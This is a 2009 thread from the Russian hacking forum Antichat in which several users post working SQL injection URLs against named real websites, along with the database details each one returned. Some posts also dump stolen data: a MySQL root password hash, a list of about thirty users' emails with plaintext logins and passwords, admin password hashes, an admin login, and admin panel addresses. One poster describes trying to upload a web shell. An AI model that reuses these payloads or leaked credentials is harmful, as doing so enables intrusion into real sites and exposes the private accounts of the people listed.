ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9731  
Старый 07.06.2009, 10:03
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.infopolitic.ro/index.php?page=stire&id_categorie=5&id=-10984+UNION+SELECT+1,2,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user(),@@version_compile_os))), 4,5,6,7,8,9/*


Database Version: 4.1.11-Debian_4sarge7-log
Database name: infopolitic
User name: infopolitic@localhost
Os : pc-linux-gnu
 
Ответить с цитированием

  #9732  
Старый 07.06.2009, 10:20
TreV@N
Участник форума
Регистрация: 14.07.2008
Сообщений: 117
Провел на форуме:
792994

Репутация: 104
По умолчанию

http://www.beliefproductions.org/

Цитата:
http://www.beliefproductions.org/news.php?id=-1+union+select+1,2,3,concat_ws(char(124),version() ,database(),user()),5--
Database Version: 5.0.45-community-nt
Database name: network_shared
User name: anubis@localhost


==================================================

http://vegasfasteners.com/

Цитата:
http://vegasfasteners.com/news.php?id=-1+union+select+1,concat_ws(char(124),version(),dat abase(),user()),3,4,5,6,7--
Database Version: 5.0.67
Database name: vegasfast_snews
User name: vegasfast_snews@localhost


==================================================

http://www.steameconomies.com/

Цитата:
http://www.steameconomies.com/news.php?id=-1+union+select+1,2,concat_ws(char(124),version(),d atabase(),user()),4,5--
Database Version: 4.1.22
Database name: steameco_cms
User name: steameco_cms@localhost


==================================================

http://www.stroykirpich.ru/

Цитата:
http://www.stroykirpich.ru/news/news.php?id=-1+union+select+1,2,concat_ws(char(124),version(),d atabase(),user()),4,5,6,7,8--
Database Version: 5.0.67
Database name: zloi-alex_kirpich
User name: zloi-alex@localhost


==================================================

http://www.usbufa.ru/

Цитата:
http://www.usbufa.ru/news.php?id=-1+union+select+1,2,concat_ws(char(124),version(),d atabase(),user()),4--
Database Version: 5.0.67
Database name: alcomsoftru_ftsr
User name: alcomsoftru@78.108.81.91


==================================================

http://www.havana.co.nz/

Цитата:
http://www.havana.co.nz/news.php?id=-1+union+select+1,concat_ws(char(124),version(),dat abase(),user()),3,4,5--
Database Version: 5.0.67-log
Database name: havana
User name: theflipside@stargate.spotway.com
 
Ответить с цитированием

  #9733  
Старый 07.06.2009, 10:37
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://uralstroyinfo.ru/?id=56&cat=3+and+substring(version(),1,1)=5
тиц 600, pr 4

-------

http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-26+union+select+1,2,concat_Ws(0x3a,version(),user( ),database()),4,5,6,7/*

4.0.27:root@zvm8:temp_db

http://www.mosoblmedia.ru/cgi-bin/show.pl?gid=-26+union+select+1,2,concat_ws(0x3a,user,password), 4,5,6,7+from+mysql.user+limit+0,1/*

root:44fde13c2e079229

-------

PR 5

http://goszakupki.avo.ru/tender.php?tender=12152+and+substring(version(),1, 1)=5

Последний раз редактировалось AlexSatter; 07.06.2009 в 11:17..
 
Ответить с цитированием

  #9734  
Старый 07.06.2009, 13:26
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

Цитата:
http://www.social-capital.net/showart.php?articleid=-1+union+select+user(),database(),version(),4
PR 5 TIC 0

Database Version: 5.0.45-log
Database name: socialcap1
User name: socialcap1@213.171.218.197



Админка - http://www.social-capital.net/admin/

Часть админки запоролена - в БД пароля не нашел. Загрузить шелл не получилось т.к. скипт жестко все фильтрует, НО у меня даже не получилось загрузить Jpg... только папки можно создавать и редактировать тексты на сайте.
 
Ответить с цитированием

  #9735  
Старый 07.06.2009, 13:33
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.skolcompany.com/?issue_id=101+and+substring(version(),1,1)=5
----------
http://www.uazsp.ru/catalog.php?producer_id=1+and+substring(version(), 1,1)=4
----------

PR 3, ТИЦ 50
http://www.triolcorp.com/index.php?id=-96+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F 2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E 6A656E64),17,18,19,20,21,22,23,24,25

Database Version: 5.0.51a
Database name: triolcorp
User name: triolcorp@localhost



Код:
Database [triolcorp]
    Table [triol_catalog  ( Rows)]
        id
        cat_left
        cat_right
        cat_level
        parent
        posic
        topmenu
        title
        title_ua
        header
        header_ua
        header_top
        header_top_en
        meta_description
        meta_keywords
        page_text
        page_text_ua
        language
        editable
        module
        link
        template
        auth
        leftmenu
        show_eng
    Table [triol_news  ( Rows)]
        id
        date
        short
        short_ua
        full
        full_ua
        name
    Table [triol_users  ( Rows)]
        id
        fio
        email
        login
        pass
        organiz
        dolgnost
        contacts
        telephon
        sayt
        pogelanie
        opyt
        source
        zakaz
        info
        status

        tag_content
        tag_content_en
        editable_text
        page_text
        page_text_en
Пользователи: id:email:loginass
Код:
[0]:9:a.ivanova@triolcorp.com.ua:alena:tata
[1]:12:kurmaev13@com.mels.ru:kurmaev13:kurmaev13
[2]:11:cementplant@cyber.net.pk:cementplant:haider
[3]:13:avaplus@mail.ru:avaplus:maslen
[4]:14:alifoleg@yandex.ru:Alifoleg:05061956
[5]:15:info@shibbolet.e4u.ru:silver-rtf:lisrw1979
[6]:16:swn90@mail.ru:swn:2039
[7]:17:oooema@rambler.ru:oooema:347077
[8]:18:AMalyshev1986@yandex.ru:AMalyshev1986:1234sasha
[9]:19:be_elena@mail.ru:elena:proect
[10]:20:V_i_t_a_x_a@mail.ru:V_i_t_a_x_a:786998
[11]:21:amigo67@mail.ru:amigo67:141104
[12]:22:sheruzis@yahoo.com:Sherzod:triol
[13]:23:sheruzis@yahoo.com:Sherzod:triol
[14]:24:prodiys55@mail.ru:prodiys55:2337693819
[15]:25:stroypkf@ukrpost.ua:pkf23:230797
[16]:26:sayat@aim.kz:Sayat:6669
[17]:27:spashkova@energokaskad.com:$$V:abkmrf
[18]:28:maximaptechkin@mail.ru:maximaptechkin:jrcfyf
[19]:29:alex2703@yandex.ru:Алексей Михайлович:klever
[20]:30:uvguyk@oiykwc.com:nKjlrzLeS:WqlMkahKDPNpVD
[21]:31:wzikgf@ariiid.com:WePqpoLEmLOzzgEzj:ifxMQVeATfFcuMNi
[22]:32:thajlandua@mail.ru:Thajlander:fXcflPF497
[23]:33:mailorka712@mail.ru:DevochkaX:gVKBKIc561
[24]:34:ksi@acrylat.ru:gamozda:kislota276080
[25]:35:k07@mail.ru:kojin:7793
[26]:36:forwardk@gmail.com:oskar:energo
[27]:37:EKolodych@gmail.com:EKolodych:123654
[28]:38:ua1ogy@atnet.ru:vovkmix:36127380
[29]:39:sedovnt@yandex.ru:sslonn:123123123
[30]:40:neyasut87@rambler.ru:student:neyasut
 
Ответить с цитированием

  #9736  
Старый 07.06.2009, 15:51
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.vidatec.ru/?page=-3+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A6265 67696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F, User(),0x7873716C696E6A656E64),6,7,8,9,10,11,12

Database Version: 4.1.22
Database name: alpro
User name: alpro@localhost


таблицы, которые удалось найти:
catalog
groups
orders
partners


-------

http://www.monopolia-rti.ru/index.php?grid=12)+and+(substring(version(),1,1)=5
 
Ответить с цитированием

  #9737  
Старый 07.06.2009, 17:49
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

Цитата:
http://www.pogonowski.com/display.php?textid=-891+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4
PR 5

Database Version: 5.0.45-log
Database name: icp_texts
User name: user201@cgi1202.int.bizland.net

админка сломана( - Http://pogonowski.com/admin

Login -user1
Password - 123
 
Ответить с цитированием

  #9738  
Старый 07.06.2009, 18:08
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

ТИЦ 240
http://www.sibmech.ru/import.php?title=-57+union+select+concat_ws(0x3a,version(),user(),da tabase())

вывод в title
4.1.22-log:sibmech_mysql@10.1.48.196:sibmech_db
удалось найти таблицу users

содержимое таблицы users ввиде: id:loginassword


Код:
1:admin:36696630cfdec3fa4702cc6c5d6d574a
5:dub14:eda4e674e1e13f224704f4b481a0ccf3
7:test:449bca0569d57b807c0567694640293a
8:denis:eda4e674e1e13f224704f4b481a0ccf3
9:user:b7ee47e9cc42e0d00bdf6dbb4f702d8a

Админка: http://www.sibmech.ru/admin/
 
Ответить с цитированием

  #9739  
Старый 07.06.2009, 18:40
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 4]
126 полей 0_0
Код:
http://www.super55.com/word.php?id=-6467+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126
5.0.67-msl-icd1-log:super55_szotar:super55@localhost

[PR 2]
Код:
http://centralboys.thsll.org/rep.php?id=-9+union+select+1,2,concat_ws(0x2a,version(),database(),user()),4&rep=2009_rep
5.0.27:centralboys:tlax@localhost
 
Ответить с цитированием

  #9740  
Старый 07.06.2009, 19:03
SkyLine32
Участник форума
Регистрация: 01.03.2009
Сообщений: 121
Провел на форуме:
4022236

Репутация: 38
Отправить сообщение для SkyLine32 с помощью ICQ Отправить сообщение для SkyLine32 с помощью AIM Отправить сообщение для SkyLine32 с помощью MSN Отправить сообщение для SkyLine32 с помощью Yahoo
По умолчанию

Цитата:
http://www.ivo.nl/?id=-607+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F, Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E6 4),0x71),0x71)--
Database Version: 4.1.15-standard
Database name: ivo
User name: webivo@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ